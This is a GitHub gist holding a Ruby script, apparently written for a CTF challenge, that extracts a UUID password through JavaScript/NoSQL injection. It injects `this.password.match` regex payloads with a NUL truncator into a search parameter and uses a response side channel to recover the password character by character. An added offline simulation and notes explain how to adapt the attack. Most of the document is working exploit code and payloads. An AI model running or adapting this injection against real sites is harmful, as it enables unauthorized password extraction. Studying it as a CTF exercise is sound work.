@kiesia
Created February 17, 2020 08:53
CTF Password Brute Forcer
#!/usr/bin/env ruby
#
# This script solves a simple CTF problem in which a password can be gradually
# guessed by iterating through all possible combinations using a regex matcher:
# the search parameter is injected with a JavaScript expression that tests
# whether this.password starts with the characters recovered so far plus one
# more guess, and the page's response reveals whether the regex matched.
#
# The password takes the form of a UUID.
#
# Requires the net-http-persistent gem (gem install net-http-persistent).
require 'net/http/persistent'

# Available hexadecimal UUID characters to match (lowercase only; an
# uppercase UUID would never match unless the regex is made case-insensitive).
UUID_CHARS = [*"0".."9"] + [*"a".."f"]

# Create initial array of nils in UUID format (8-4-4-4-12); the dashes are
# already known, so only the nil slots have to be recovered.
key = Array.new(8) + %w(-) + Array.new(4) + %w(-) + Array.new(4) + %w(-) + Array.new(4) + %w(-) + Array.new(12)

conn = Net::HTTP::Persistent.new

# Recurse through matchers, return a match character when found.
# Raises once every candidate has been tried without a hit, instead of
# recursing forever on the nil that Array#pop returns when exhausted.
def match(conn, key, matchers)
  matcher = matchers.pop
  raise "No match at position #{key.index(nil)} (known prefix: #{matched(key)})" if matcher.nil?
  # Replace <domain> with the target host. The payload closes the search
  # string with a quote, appends `&& this.password.match(/^<known><guess>.*$/)`
  # (`%26%26` is `&&`) and ends with a NUL (`%00`) to truncate whatever the
  # server appends after the injected value.
  uri = URI("http://<domain>/?search=admin'%20%26%26%20this.password.match(/^#{matched(key)}#{matcher}.*$/)%00")
  puts "Trying: #{uri}"
  res = conn.request(uri)
  # The vulnerable page echoes the search term only when the regex matched.
  if res.body.include?("?search=admin")
    matcher
  else
    match(conn, key, matchers)
  end
end

# Returns a string containing known password characters (everything before
# the first unrecovered slot).
def matched(key)
  i = key.index(nil)
  i.nil? ? key.join : key[0, i].join
end

# Iterate through nil key values and replace them with matches when found.
key.each.with_index do |k, i|
  next unless k.nil?
  key[i] = match(conn, key, UUID_CHARS.clone)
  puts "Matched: #{matched(key)}"
end

puts "==========================="
puts "Key discovered! #{key.join}"
puts "==========================="
conn.shutdown
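Added example, not part of the gist: an offline simulation of the same prefix-extension attack. The HTTP request is replaced by a local oracle lambda that answers the only question the injected regex asks the server (does the secret start with this prefix?), so the block runs without a target and shows why the attack costs at most 16 queries per hex digit instead of 16^32 guesses. The names payload_for, make_oracle, recover_uuid, query_budget and counting_oracle, and the sample secret in the usage below, are all constructed here and do not come from the script above.

```ruby
#!/usr/bin/env ruby
# Added example: offline simulation of the prefix-extension oracle attack
# performed by the gist above. No network access; the oracle is a local lambda
# that stands in for the vulnerable search endpoint.
require 'securerandom'

HEX = [*'0'..'9', *'a'..'f'].freeze

# UUID layout 8-4-4-4-12: dashes are known, nil slots must be recovered.
UUID_TEMPLATE = (
  [nil] * 8 + ['-'] + [nil] * 4 + ['-'] + [nil] * 4 + ['-'] + [nil] * 4 + ['-'] + [nil] * 12
).freeze

# The injected JavaScript fragment the gist sends (URL-decoded), for one guess:
# a quote closes the search string, `&&` appends the regex test, and the
# trailing NUL truncates whatever the server appends afterwards.
def payload_for(prefix)
  "admin' && this.password.match(/^#{prefix}.*$/)\u0000"
end

# Constructed stand-in for the vulnerable endpoint. The real server evaluates
# the attacker's regex literally; here Regexp.escape only guards the simulation.
# Returns true when the secret starts with the guessed prefix.
def make_oracle(secret)
  ->(prefix) { secret.match?(/\A#{Regexp.escape(prefix)}.*\z/) }
end

# Recover the secret one slot at a time using only the boolean oracle.
# Raises if no hex digit extends the current prefix (e.g. an uppercase secret).
def recover_uuid(oracle, template = UUID_TEMPLATE)
  key = template.dup
  key.each_index do |i|
    next unless key[i].nil?
    known = key[0, i].join
    hit = HEX.find { |c| oracle.call(known + c) }
    raise "no candidate at slot #{i} (prefix #{known.inspect})" if hit.nil?
    key[i] = hit
  end
  key.join
end

# Worst-case number of oracle queries: one per candidate per unknown slot.
def query_budget(template = UUID_TEMPLATE)
  template.count(nil) * HEX.size
end

# Wrap an oracle so the number of queries it answered can be read back.
def counting_oracle(oracle)
  calls = 0
  counted = ->(prefix) { calls += 1; oracle.call(prefix) }
  [counted, -> { calls }]
end

if $PROGRAM_NAME == __FILE__
  secret = SecureRandom.uuid                       # constructed target, lowercase hex
  oracle, calls = counting_oracle(make_oracle(secret))
  puts "sample payload: #{payload_for('0f').inspect}"
  recovered = recover_uuid(oracle)
  puts "recovered: #{recovered}  (#{calls.call} queries, budget #{query_budget})"
  abort 'mismatch' unless recovered == secret
end
```

Two caveats carry over to the real script. The alphabet is lowercase hex, so a target that stores UUIDs in uppercase never matches; either add the `i` flag to the injected regex or widen the alphabet. And the detection step (`res.body.include?("?search=admin")` in the gist) is a page-specific side channel: if the response differs in some other way between a matching and a non-matching regex, that difference is what the oracle has to test.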